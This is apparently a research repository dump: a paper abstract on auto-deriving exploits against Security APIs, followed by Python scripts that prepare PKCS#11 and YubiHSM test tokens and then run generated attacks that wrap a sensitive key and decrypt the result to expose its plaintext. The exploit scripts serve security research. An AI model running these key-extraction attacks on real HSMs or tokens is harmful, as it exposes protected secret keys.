Adaptive Exploit Generation against Security Devices and Security APIs

Proof-of-concept exploits help demonstrate software vulnerability beyond doubt and communicate attacks to non-experts. But exploits can be configuration-specific, for example when in Security APIs, where keys are set up specifically for the application and enterprise the API serves. In this work, we show how to automatically derive proof-of-concept exploits against Security APIs using formal methods. We extend the popular protocol verifier ProVerif with a language-agnostic template mechanism. Employing program snippets attached to steps in the model, we can transform attack traces (which ProVerif typically finds automatically) into programs. Our method is general, flexible and convenient. We demonstrate its use for the W3C Web Cryptography API, for PKCS#11 and for the YubiHSM2, providing the first formal model of the latter.

==> evaluation/pkcs11evaluation/pkcs11prepare1.py <==
import pkcs11
from pkcs11 import Mechanism, KeyType, Attribute, ObjectClass
import os

lib = pkcs11.lib(os.environ['PKCS11_MODULE'])
token = lib.get_token(token_label='SWToken')

session = token.open(rw=True, user_pin='12345678')


def build_template(a1, a2, a3, a4, a5, a6, a7, a8):
    template = {}
    if a1 == "True":
        template[Attribute.SENSITIVE] = True
    elif a1 == "False":
        template[Attribute.SENSITIVE] = False
    if a2 == "True":
        template[Attribute.ENCRYPT] = True
    elif a2 == "False":
        template[Attribute.ENCRYPT] = False
    if a3 == "True":
        template[Attribute.DECRYPT] = True
    elif a3 == "False":
        template[Attribute.DECRYPT] = False
    if a4 == "True":
        template[Attribute.WRAP] = True
    elif a4 == "False":
        template[Attribute.WRAP] = False
    if a5 == "True":
        template[Attribute.UNWRAP] = True
    elif a5 == "False":
        template[Attribute.UNWRAP] = False
    if a6 == "True":
        template[Attribute.EXTRACTABLE] = True
    elif a6 == "False":
        template[Attribute.EXTRACTABLE] = False
    if a7 == "True":
        template[Attribute.WRAP_WITH_TRUSTED] = True
    elif a7 == "False":
        template[Attribute.WRAP_WITH_TRUSTED] = False
    if a8 == "True":
        template[Attribute.TRUSTED] = True
    elif a8 == "False":
        template[Attribute.TRUSTED] = False
    return template


for k in session.get_objects({Attribute.CLASS: ObjectClass.SECRET_KEY}):
    print(k)
    k.destroy()

for k in session.get_objects({Attribute.CLASS: ObjectClass.PRIVATE_KEY}):
    print(k)
    k.destroy()

for k in session.get_objects({Attribute.CLASS: ObjectClass.PUBLIC_KEY}):
    print(k)
    k.destroy()

session.create_object({Attribute.CLASS: ObjectClass.SECRET_KEY,
                       Attribute.KEY_TYPE: KeyType.AES,
                       Attribute.VALUE: b'AAAAAAAAAAAAAAAA',
                       Attribute.VALUE_LEN: 16,
                       Attribute.SENSITIVE: True,
                       Attribute.ENCRYPT: False,
                       Attribute.DECRYPT: False,
                       Attribute.WRAP: False,
                       Attribute.UNWRAP: False,
                       Attribute.EXTRACTABLE: True,
                       Attribute.TOKEN: True,
                       Attribute.ID: b'\x01'})

session.generate_key(KeyType.DES3, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: False,
    Attribute.DECRYPT: True,
    Attribute.WRAP: True,
    Attribute.UNWRAP: False,
    Attribute.EXTRACTABLE: False,
    Attribute.TOKEN: True,
    Attribute.ID: b'\x02'})

session.close()


==> evaluation/pkcs11evaluation/pkcs11prepare2.py <==
import pkcs11
from pkcs11 import Mechanism, KeyType, Attribute, ObjectClass
import os

lib = pkcs11.lib(os.environ['PKCS11_MODULE'])
token = lib.get_token(token_label='SWToken')

session = token.open(rw=True, user_pin='12345678')


def build_template(a1, a2, a3, a4, a5, a6, a7, a8):
    template = {}
    if a1 == "True":
        template[Attribute.SENSITIVE] = True
    elif a1 == "False":
        template[Attribute.SENSITIVE] = False
    if a2 == "True":
        template[Attribute.ENCRYPT] = True
    elif a2 == "False":
        template[Attribute.ENCRYPT] = False
    if a3 == "True":
        template[Attribute.DECRYPT] = True
    elif a3 == "False":
        template[Attribute.DECRYPT] = False
    if a4 == "True":
        template[Attribute.WRAP] = True
    elif a4 == "False":
        template[Attribute.WRAP] = False
    if a5 == "True":
        template[Attribute.UNWRAP] = True
    elif a5 == "False":
        template[Attribute.UNWRAP] = False
    if a6 == "True":
        template[Attribute.EXTRACTABLE] = True
    elif a6 == "False":
        template[Attribute.EXTRACTABLE] = False
    if a7 == "True":
        template[Attribute.WRAP_WITH_TRUSTED] = True
    elif a7 == "False":
        template[Attribute.WRAP_WITH_TRUSTED] = False
    if a8 == "True":
        template[Attribute.TRUSTED] = True
    elif a8 == "False":
        template[Attribute.TRUSTED] = False
    return template


for k in session.get_objects({Attribute.CLASS: ObjectClass.SECRET_KEY}):
    print(k)
    k.destroy()

for k in session.get_objects({Attribute.CLASS: ObjectClass.PRIVATE_KEY}):
    print(k)
    k.destroy()

for k in session.get_objects({Attribute.CLASS: ObjectClass.PUBLIC_KEY}):
    print(k)
    k.destroy()

session.create_object({Attribute.CLASS: ObjectClass.SECRET_KEY,
                       Attribute.KEY_TYPE: KeyType.AES,
                       Attribute.VALUE: b'AAAAAAAAAAAAAAAA',
                       Attribute.VALUE_LEN: 16,
                       Attribute.SENSITIVE: True,
                       Attribute.ENCRYPT: False,
                       Attribute.DECRYPT: False,
                       Attribute.WRAP: False,
                       Attribute.UNWRAP: False,
                       Attribute.EXTRACTABLE: True,
                       Attribute.TOKEN: True,
                       Attribute.ID: b'\x01'})

session.generate_key(KeyType.DES3, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: False,
    Attribute.WRAP: False,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.TOKEN: True,
    Attribute.ID: b'\x02'})

session.close()


==> evaluation/pkcs11evaluation/pkcs11prepare3.py <==
import pkcs11
from pkcs11 import Mechanism, KeyType, Attribute, ObjectClass
import os

lib = pkcs11.lib(os.environ['PKCS11_MODULE'])
token = lib.get_token(token_label='SWToken')

session = token.open(rw=True, user_pin='12345678')


def build_template(a1, a2, a3, a4, a5, a6, a7, a8):
    template = {}
    if a1 == "True":
        template[Attribute.SENSITIVE] = True
    elif a1 == "False":
        template[Attribute.SENSITIVE] = False
    if a2 == "True":
        template[Attribute.ENCRYPT] = True
    elif a2 == "False":
        template[Attribute.ENCRYPT] = False
    if a3 == "True":
        template[Attribute.DECRYPT] = True
    elif a3 == "False":
        template[Attribute.DECRYPT] = False
    if a4 == "True":
        template[Attribute.WRAP] = True
    elif a4 == "False":
        template[Attribute.WRAP] = False
    if a5 == "True":
        template[Attribute.UNWRAP] = True
    elif a5 == "False":
        template[Attribute.UNWRAP] = False
    if a6 == "True":
        template[Attribute.EXTRACTABLE] = True
    elif a6 == "False":
        template[Attribute.EXTRACTABLE] = False
    if a7 == "True":
        template[Attribute.WRAP_WITH_TRUSTED] = True
    elif a7 == "False":
        template[Attribute.WRAP_WITH_TRUSTED] = False
    if a8 == "True":
        template[Attribute.TRUSTED] = True
    elif a8 == "False":
        template[Attribute.TRUSTED] = False
    return template


for k in session.get_objects({Attribute.CLASS: ObjectClass.SECRET_KEY}):
    print(k)
    k.destroy()

for k in session.get_objects({Attribute.CLASS: ObjectClass.PRIVATE_KEY}):
    print(k)
    k.destroy()

for k in session.get_objects({Attribute.CLASS: ObjectClass.PUBLIC_KEY}):
    print(k)
    k.destroy()

session.generate_keypair(KeyType.RSA, key_length=2048, store=True, public_template={
    Attribute.ENCRYPT: True,
    Attribute.WRAP: False,
    Attribute.TOKEN: True,
    Attribute.ID: b'\x01'}, private_template={
    Attribute.SENSITIVE: True,
    Attribute.DECRYPT: False,
    Attribute.UNWRAP: False,
    Attribute.EXTRACTABLE: True,
    Attribute.ID: b'\x02'})

session.generate_key(KeyType.DES3, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: False,
    Attribute.WRAP: False,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x03'})

session.generate_key(KeyType.AES, key_length=128, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: True,
    Attribute.WRAP: False,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x04'})

session.close()


==> evaluation/pkcs11evaluation/pkcs11prepare4.py <==
import pkcs11
from pkcs11 import Mechanism, KeyType, Attribute, ObjectClass
import os

lib = pkcs11.lib(os.environ['PKCS11_MODULE'])
token = lib.get_token(token_label='SWToken')

session = token.open(rw=True, user_pin='12345678')


def build_template(a1, a2, a3, a4, a5, a6, a7, a8):
    template = {}
    if a1 == "True":
        template[Attribute.SENSITIVE] = True
    elif a1 == "False":
        template[Attribute.SENSITIVE] = False
    if a2 == "True":
        template[Attribute.ENCRYPT] = True
    elif a2 == "False":
        template[Attribute.ENCRYPT] = False
    if a3 == "True":
        template[Attribute.DECRYPT] = True
    elif a3 == "False":
        template[Attribute.DECRYPT] = False
    if a4 == "True":
        template[Attribute.WRAP] = True
    elif a4 == "False":
        template[Attribute.WRAP] = False
    if a5 == "True":
        template[Attribute.UNWRAP] = True
    elif a5 == "False":
        template[Attribute.UNWRAP] = False
    if a6 == "True":
        template[Attribute.EXTRACTABLE] = True
    elif a6 == "False":
        template[Attribute.EXTRACTABLE] = False
    if a7 == "True":
        template[Attribute.WRAP_WITH_TRUSTED] = True
    elif a7 == "False":
        template[Attribute.WRAP_WITH_TRUSTED] = False
    if a8 == "True":
        template[Attribute.TRUSTED] = True
    elif a8 == "False":
        template[Attribute.TRUSTED] = False
    return template


for k in session.get_objects({Attribute.CLASS: ObjectClass.SECRET_KEY}):
    print(k)
    k.destroy()

for k in session.get_objects({Attribute.CLASS: ObjectClass.PRIVATE_KEY}):
    print(k)
    k.destroy()

for k in session.get_objects({Attribute.CLASS: ObjectClass.PUBLIC_KEY}):
    print(k)
    k.destroy()

session.generate_key(KeyType.DES3, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: False,
    Attribute.WRAP: False,
    Attribute.UNWRAP: False,
    Attribute.EXTRACTABLE: True,
    Attribute.ID: b'\x01'})

session.generate_keypair(KeyType.RSA, key_length=2048, store=True, public_template={
    Attribute.ENCRYPT: True,
    Attribute.WRAP: False,
    Attribute.TOKEN: True,
    Attribute.ID: b'\x02'}, private_template={
    Attribute.SENSITIVE: True,
    Attribute.DECRYPT: False,
    Attribute.UNWRAP: False,
    Attribute.EXTRACTABLE: True,
    Attribute.ID: b'\x03'})

session.generate_key(KeyType.DES3, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: False,
    Attribute.WRAP: False,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x04'})

session.generate_key(KeyType.AES, key_length=128, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: True,
    Attribute.WRAP: False,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x05'})

session.generate_key(KeyType.AES, key_length=128, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: False,
    Attribute.DECRYPT: True,
    Attribute.WRAP: True,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x06'})

session.close()


==> evaluation/pkcs11evaluation/pkcs11prepare5.py <==
import pkcs11
from pkcs11 import Mechanism, KeyType, Attribute, ObjectClass
import os

lib = pkcs11.lib(os.environ['PKCS11_MODULE'])
token = lib.get_token(token_label='SWToken')

session = token.open(rw=True, user_pin='12345678')


def build_template(a1, a2, a3, a4, a5, a6, a7, a8):
    template = {}
    if a1 == "True":
        template[Attribute.SENSITIVE] = True
    elif a1 == "False":
        template[Attribute.SENSITIVE] = False
    if a2 == "True":
        template[Attribute.ENCRYPT] = True
    elif a2 == "False":
        template[Attribute.ENCRYPT] = False
    if a3 == "True":
        template[Attribute.DECRYPT] = True
    elif a3 == "False":
        template[Attribute.DECRYPT] = False
    if a4 == "True":
        template[Attribute.WRAP] = True
    elif a4 == "False":
        template[Attribute.WRAP] = False
    if a5 == "True":
        template[Attribute.UNWRAP] = True
    elif a5 == "False":
        template[Attribute.UNWRAP] = False
    if a6 == "True":
        template[Attribute.EXTRACTABLE] = True
    elif a6 == "False":
        template[Attribute.EXTRACTABLE] = False
    if a7 == "True":
        template[Attribute.WRAP_WITH_TRUSTED] = True
    elif a7 == "False":
        template[Attribute.WRAP_WITH_TRUSTED] = False
    if a8 == "True":
        template[Attribute.TRUSTED] = True
    elif a8 == "False":
        template[Attribute.TRUSTED] = False
    return template


for k in session.get_objects({Attribute.CLASS: ObjectClass.SECRET_KEY}):
    print(k)
    k.destroy()

for k in session.get_objects({Attribute.CLASS: ObjectClass.PRIVATE_KEY}):
    print(k)
    k.destroy()

for k in session.get_objects({Attribute.CLASS: ObjectClass.PUBLIC_KEY}):
    print(k)
    k.destroy()

session.create_object({Attribute.CLASS: ObjectClass.SECRET_KEY,
                       Attribute.KEY_TYPE: KeyType.AES,
                       Attribute.VALUE: b'AAAAAAAAAAAAAAAA',
                       Attribute.VALUE_LEN: 16,
                       Attribute.SENSITIVE: True,
                       Attribute.ENCRYPT: True,
                       Attribute.DECRYPT: False,
                       Attribute.WRAP: False,
                       Attribute.UNWRAP: False,
                       Attribute.EXTRACTABLE: True,
                       Attribute.TOKEN: True,
                       Attribute.ID: b'\x01'})

session.generate_keypair(KeyType.RSA, key_length=2048, store=True, public_template={
    Attribute.ENCRYPT: True,
    Attribute.WRAP: False,
    Attribute.ID: b'\x02'}, private_template={
    Attribute.SENSITIVE: True,
    Attribute.DECRYPT: False,
    Attribute.UNWRAP: False,
    Attribute.EXTRACTABLE: True,
    Attribute.ID: b'\x03'})

session.generate_key(KeyType.DES3, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: False,
    Attribute.WRAP: False,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x04'})

session.generate_key(KeyType.AES, key_length=128, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: True,
    Attribute.WRAP: False,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x05'})

session.generate_key(KeyType.AES, key_length=128, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: False,
    Attribute.DECRYPT: True,
    Attribute.WRAP: False,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x06'})

session.generate_key(KeyType.DES3, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: False,
    Attribute.WRAP: False,
    Attribute.UNWRAP: False,
    Attribute.EXTRACTABLE: True,
    Attribute.ID: b'\x07'})

session.generate_keypair(KeyType.RSA, key_length=2048, store=True, public_template={
    Attribute.ENCRYPT: True,
    Attribute.WRAP: False,
    Attribute.ID: b'\x08'}, private_template={
    Attribute.SENSITIVE: True,
    Attribute.DECRYPT: False,
    Attribute.UNWRAP: False,
    Attribute.EXTRACTABLE: True,
    Attribute.ID: b'\x09'})

session.generate_key(KeyType.DES3, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: False,
    Attribute.WRAP: False,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x10'})

session.generate_key(KeyType.AES, key_length=128, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: True,
    Attribute.DECRYPT: True,
    Attribute.WRAP: False,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x11'})

session.generate_key(KeyType.AES, key_length=128, store=True, template={
    Attribute.SENSITIVE: True,
    Attribute.ENCRYPT: False,
    Attribute.DECRYPT: False,
    Attribute.WRAP: True,
    Attribute.UNWRAP: True,
    Attribute.EXTRACTABLE: False,
    Attribute.ID: b'\x12'})

session.close()


==> evaluation/pkcs11evaluation/pkcs11result1.py <==
import pkcs11
from pkcs11 import Mechanism, KeyType, Attribute, ObjectClass
import os

lib = pkcs11.lib(os.environ['PKCS11_MODULE'])
token = lib.get_token(token_label='SWToken')

session = token.open(rw=True, user_pin='12345678')

iv1 = session.generate_random(64)
iv2 = session.generate_random(128)


def build_template(a1, a2, a3, a4, a5, a6):
    template = {}
    if a1 == "True":
        template[Attribute.SENSITIVE] = True
    elif a1 == "False":
        template[Attribute.SENSITIVE] = False
    if a2 == "True":
        template[Attribute.ENCRYPT] = True
    elif a2 == "False":
        template[Attribute.ENCRYPT] = False
    if a3 == "True":
        template[Attribute.DECRYPT] = True
    elif a3 == "False":
        template[Attribute.DECRYPT] = False
    if a4 == "True":
        template[Attribute.WRAP] = True
    elif a4 == "False":
        template[Attribute.WRAP] = False
    if a5 == "True":
        template[Attribute.UNWRAP] = True
    elif a5 == "False":
        template[Attribute.UNWRAP] = False
    if a6 == "True":
        template[Attribute.EXTRACTABLE] = True
    elif a6 == "False":
        template[Attribute.EXTRACTABLE] = False
    return template


used_keys = []

x1 = session.get_key(id=b'\x02')

x2 = session.get_key(id=b'\x01')

if KeyType.DES3 == KeyType.DES3:
    mech = Mechanism.DES3_CBC_PAD
    iv = iv1
else:
    mech = Mechanism.AES_CBC_PAD
    iv = iv2
x3 = x1.wrap_key(x2, mechanism=mech, mechanism_param=iv)

if KeyType.DES3 == KeyType.DES3:
    mech = Mechanism.DES3_CBC_PAD
    iv = iv1
else:
    mech = Mechanism.AES_CBC_PAD
    iv = iv2
x4 = x1.decrypt(x3, mechanism=mech, mechanism_param=iv)

print("The following key of type " + str(KeyType.AES) + " has been found: " + str(x4))

for k in used_keys:
    k.destroy()
session.close()


==> evaluation/pkcs11evaluation/pkcs11result2.py <==
import pkcs11
from pkcs11 import Mechanism, KeyType, Attribute, ObjectClass
import os

lib = pkcs11.lib(os.environ['PKCS11_MODULE'])
token = lib.get_token(token_label='SWToken')

session = token.open(rw=True, user_pin='12345678')

iv1 = session.generate_random(64)
iv2 = session.generate_random(128)


def build_template(a1, a2, a3, a4, a5, a6):
    template = {}
    if a1 == "True":
        template[Attribute.SENSITIVE] = True
    elif a1 == "False":
        template[Attribute.SENSITIVE] = False
    if a2 == "True":
        template[Attribute.ENCRYPT] = True
    elif a2 == "False":
        template[Attribute.ENCRYPT] = False
    if a3 == "True":
        template[Attribute.DECRYPT] = True
    elif a3 == "False":
        template[Attribute.DECRYPT] = False
    if a4 == "True":
        template[Attribute.WRAP] = True
    elif a4 == "False":
        template[Attribute.WRAP] = False
    if a5 == "True":
        template[Attribute.UNWRAP] = True
    elif a5 == "False":
        template[Attribute.UNWRAP] = False
    if a6 == "True":
        template[Attribute.EXTRACTABLE] = True
    elif a6 == "False":
        template[Attribute.EXTRACTABLE] = False
    return template


used_keys = []

x1 = session.generate_key(KeyType.AES, 256, store=True, template=build_template("x2", "x3", "True", "True", "x4", "x5"))
used_keys.append(x1)

x6 = session.get_key(id=b'\x01')

if KeyType.AES == KeyType.DES3:
    mech = Mechanism.DES3_CBC_PAD
    iv = iv1
else:
    mech = Mechanism.AES_CBC_PAD
    iv = iv2
x7 = x1.wrap_key(x6, mechanism=mech, mechanism_param=iv)

if KeyType.AES == KeyType.DES3:
    mech = Mechanism.DES3_CBC_PAD
    iv = iv1
else:
    mech = Mechanism.AES_CBC_PAD
    iv = iv2
x8 = x1.decrypt(x7, mechanism=mech, mechanism_param=iv)

print("The following key of type " + str(KeyType.AES) + " has been found: " + str(x8))

for k in used_keys:
    k.destroy()
session.close()


==> evaluation/pkcs11evaluation/pkcs11result3.py <==
import pkcs11
from pkcs11 import Mechanism, KeyType, Attribute, ObjectClass
import os

lib = pkcs11.lib(os.environ['PKCS11_MODULE'])
token = lib.get_token(token_label='SWToken')

session = token.open(rw=True, user_pin='12345678')

iv1 = session.generate_random(64)
iv2 = session.generate_random(128)


def build_template(a1, a2, a3, a4, a5, a6):
    template = {}
    if a1 == "True":
        template[Attribute.SENSITIVE] = True
    elif a1 == "False":
        template[Attribute.SENSITIVE] = False
    if a2 == "True":
        template[Attribute.ENCRYPT] = True
    elif a2 == "False":
        template[Attribute.ENCRYPT] = False
    if a3 == "True":
        template[Attribute.DECRYPT] = True
    elif a3 == "False":
        template[Attribute.DECRYPT] = False
    if a4 == "True":
        template[Attribute.WRAP] = True
    elif a4 == "False":
        template[Attribute.WRAP] = False
    if a5 == "True":
        template[Attribute.UNWRAP] = True
    elif a5 == "False":
        template[Attribute.UNWRAP] = False
    if a6 == "True":
        template[Attribute.EXTRACTABLE] = True
    elif a6 == "False":
        template[Attribute.EXTRACTABLE] = False
    return template


used_keys = []

x1 = session.generate_key(KeyType.AES, 256, store=True, template=build_template("x2", "x3", "True", "True", "x4", "x5"))
used_keys.append(x1)

x6 = session.get_key(id=b'\x02')

if KeyType.AES == KeyType.DES3:
    mech = Mechanism.DES3_CBC_PAD
    iv = iv1
else:
    mech = Mechanism.AES_CBC_PAD
    iv = iv2
x7 = x1.wrap_key(x6, mechanism=mech, mechanism_param=iv)

if KeyType.AES == KeyType.DES3:
    mech = Mechanism.DES3_CBC_PAD
    iv = iv1
else:
    mech = Mechanism.AES_CBC_PAD
    iv = iv2
x8 = x1.decrypt(x7, mechanism=mech, mechanism_param=iv)

print("The following key of type " + str(KeyType.RSA) + " has been found: " + str(x8))

for k in used_keys:
    k.destroy()
session.close()


==> evaluation/pkcs11evaluation/pkcs11result4.py <==
import pkcs11
from pkcs11 import Mechanism, KeyType, Attribute, ObjectClass
import os

lib = pkcs11.lib(os.environ['PKCS11_MODULE'])
token = lib.get_token(token_label='SWToken')

session = token.open(rw=True, user_pin='12345678')

iv1 = session.generate_random(64)
iv2 = session.generate_random(128)


def build_template(a1, a2, a3, a4, a5, a6):
    template = {}
    if a1 == "True":
        template[Attribute.SENSITIVE] = True
    elif a1 == "False":
        template[Attribute.SENSITIVE] = False
    if a2 == "True":
        template[Attribute.ENCRYPT] = True
    elif a2 == "False":
        template[Attribute.ENCRYPT] = False
    if a3 == "True":
        template[Attribute.DECRYPT] = True
    elif a3 == "False":
        template[Attribute.DECRYPT] = False
    if a4 == "True":
        template[Attribute.WRAP] = True
    elif a4 == "False":
        template[Attribute.WRAP] = False
    if a5 == "True":
        template[Attribute.UNWRAP] = True
    elif a5 == "False":
        template[Attribute.UNWRAP] = False
    if a6 == "True":
        template[Attribute.EXTRACTABLE] = True
    elif a6 == "False":
        template[Attribute.EXTRACTABLE] = False
    return template


used_keys = []

x1 = session.get_key(id=b'\x06')

x2 = session.get_key(id=b'\x01')

if KeyType.AES == KeyType.DES3:
    mech = Mechanism.DES3_CBC_PAD
    iv = iv1
else:
    mech = Mechanism.AES_CBC_PAD
    iv = iv2
x3 = x1.wrap_key(x2, mechanism=mech, mechanism_param=iv)

if KeyType.AES == KeyType.DES3:
    mech = Mechanism.DES3_CBC_PAD
    iv = iv1
else:
    mech = Mechanism.AES_CBC_PAD
    iv = iv2
x4 = x1.decrypt(x3, mechanism=mech, mechanism_param=iv)

print("The following key of type " + str(KeyType.DES3) + " has been found: " + str(x4))

for k in used_keys:
    k.destroy()
session.close()


==> evaluation/pkcs11evaluation/pkcs11result5.py <==
import pkcs11
from pkcs11 import Mechanism, KeyType, Attribute, ObjectClass
import os

lib = pkcs11.lib(os.environ['PKCS11_MODULE'])
token = lib.get_token(token_label='SWToken')

session = token.open(rw=True, user_pin='12345678')

iv1 = session.generate_random(64)
iv2 = session.generate_random(128)


def build_template(a1, a2, a3, a4, a5, a6):
    template = {}
    if a1 == "True":
        template[Attribute.SENSITIVE] = True
    elif a1 == "False":
        template[Attribute.SENSITIVE] = False
    if a2 == "True":
        template[Attribute.ENCRYPT] = True
    elif a2 == "False":
        template[Attribute.ENCRYPT] = False
    if a3 == "True":
        template[Attribute.DECRYPT] = True
    elif a3 == "False":
        template[Attribute.DECRYPT] = False
    if a4 == "True":
        template[Attribute.WRAP] = True
    elif a4 == "False":
        template[Attribute.WRAP] = False
    if a5 == "True":
        template[Attribute.UNWRAP] = True
    elif a5 == "False":
        template[Attribute.UNWRAP] = False
    if a6 == "True":
        template[Attribute.EXTRACTABLE] = True
    elif a6 == "False":
        template[Attribute.EXTRACTABLE] = False
    return template


used_keys = []

x1 = session.generate_key(KeyType.AES, 256, store=True, template=build_template("x2", "x3", "True", "True", "x4", "x5"))
used_keys.append(x1)

x6 = session.get_key(id=b'\x01')

if KeyType.AES == KeyType.DES3:
    mech = Mechanism.DES3_CBC_PAD
    iv = iv1
else:
    mech = Mechanism.AES_CBC_PAD
    iv = iv2
x7 = x1.wrap_key(x6, mechanism=mech, mechanism_param=iv)

if KeyType.AES == KeyType.DES3:
    mech = Mechanism.DES3_CBC_PAD
    iv = iv1
else:
    mech = Mechanism.AES_CBC_PAD
    iv = iv2
x8 = x1.decrypt(x7, mechanism=mech, mechanism_param=iv)

print("The following key of type " + str(KeyType.AES) + " has been found: " + str(x8))

for k in used_keys:
    k.destroy()
session.close()


==> evaluation/yubihsm/yubihsmprepare1.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey

connection = YubiHsm.connect()
session = connection.create_session_derived(1, 'password')

for o in session.list_objects():
    info = o.get_info()
    if not (info.id == 1 and info.object_type == OBJECT.AUTHENTICATION_KEY):
        print(info)
        o.delete()

AuthenticationKey.put_derived(session, 2, "testauthkey", 0xffff, CAPABILITY.EXPORT_WRAPPED | CAPABILITY.IMPORT_WRAPPED,
                              CAPABILITY.EXPORTABLE_UNDER_WRAP |
                              CAPABILITY.GENERATE_WRAP_KEY | CAPABILITY.PUT_WRAP_KEY |
                              CAPABILITY.EXPORT_WRAPPED | CAPABILITY.IMPORT_WRAPPED, "password")

OtpAeadKey.put(session, 1, "target", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP, ALGORITHM.AES128_YUBICO_OTP, 1,
               16 * b'A')

WrapKey.put(session, 1, "target", 0xffff, CAPABILITY.EXPORT_WRAPPED, ALGORITHM.AES128_CCM_WRAP,
            CAPABILITY.EXPORTABLE_UNDER_WRAP, 16 * b'B')

session.close()
connection.close()


==> evaluation/yubihsm/yubihsmprepare2.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey

connection = YubiHsm.connect()
session = connection.create_session_derived(1, 'password')

for o in session.list_objects():
    info = o.get_info()
    if not (info.id == 1 and info.object_type == OBJECT.AUTHENTICATION_KEY):
        print(info)
        o.delete()

AuthenticationKey.put_derived(session, 2, "testauthkey", 0xffff, CAPABILITY.EXPORT_WRAPPED | CAPABILITY.IMPORT_WRAPPED,
                              CAPABILITY.EXPORTABLE_UNDER_WRAP |
                              CAPABILITY.GENERATE_WRAP_KEY | CAPABILITY.PUT_WRAP_KEY |
                              CAPABILITY.EXPORT_WRAPPED | CAPABILITY.IMPORT_WRAPPED, "password")

OtpAeadKey.put(session, 1, "target", 0xffff, CAPABILITY.EXPORTABLE_UNDER_WRAP, ALGORITHM.AES128_YUBICO_OTP, 1,
               16 * b'A')

WrapKey.put(session, 1, "target", 0xffff, CAPABILITY.IMPORT_WRAPPED, ALGORITHM.AES128_CCM_WRAP,
            CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP, 16 * b'B')

session.close()
connection.close()


==> evaluation/yubihsm/yubihsmprepare3.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey

connection = YubiHsm.connect()
session = connection.create_session_derived(1, 'password')

for o in session.list_objects():
    info = o.get_info()
    if not (info.id == 1 and info.object_type == OBJECT.AUTHENTICATION_KEY):
        print(info)
        o.delete()

AuthenticationKey.put_derived(session, 2, "testauthkey", 0xffff, CAPABILITY.PUT_WRAP_KEY |
                              CAPABILITY.EXPORT_WRAPPED | CAPABILITY.IMPORT_WRAPPED,
                              CAPABILITY.EXPORTABLE_UNDER_WRAP, "password")

WrapKey.put(session, 1, "target", 0xffff, CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP,
            ALGORITHM.AES128_CCM_WRAP,
            CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP, 16 * b'A')

WrapKey.put(session, 2, "target", 0xffff, CAPABILITY.EXPORT_WRAPPED, ALGORITHM.AES128_CCM_WRAP,
            CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP, 16 * b'B')

session.close()
connection.close()


==> evaluation/yubihsm/yubihsmprepare4.py <==
from yubihsm import YubiHsm
from yubihsm.defs import ALGORITHM, CAPABILITY, OBJECT
from yubihsm.objects import WrapKey, HmacKey, OtpAeadKey, AuthenticationKey, AsymmetricKey

connection = YubiHsm.connect()
session = connection.create_session_derived(1, 'password')

for o in session.list_objects():
    info = o.get_info()
    if not (info.id == 1 and info.object_type == OBJECT.AUTHENTICATION_KEY):
        print(info)
        o.delete()

AuthenticationKey.put_derived(session, 2, "testauthkey", 0xffff, CAPABILITY.PUT_WRAP_KEY |
                              CAPABILITY.EXPORT_WRAPPED | CAPABILITY.IMPORT_WRAPPED,
                              CAPABILITY.EXPORTABLE_UNDER_WRAP, "password")

WrapKey.put(session, 1, "target", 0xffff, CAPABILITY.EXPORT_WRAPPED | CAPABILITY.EXPORTABLE_UNDER_WRAP,
            ALGORITHM.AES128_CCM_WRAP,
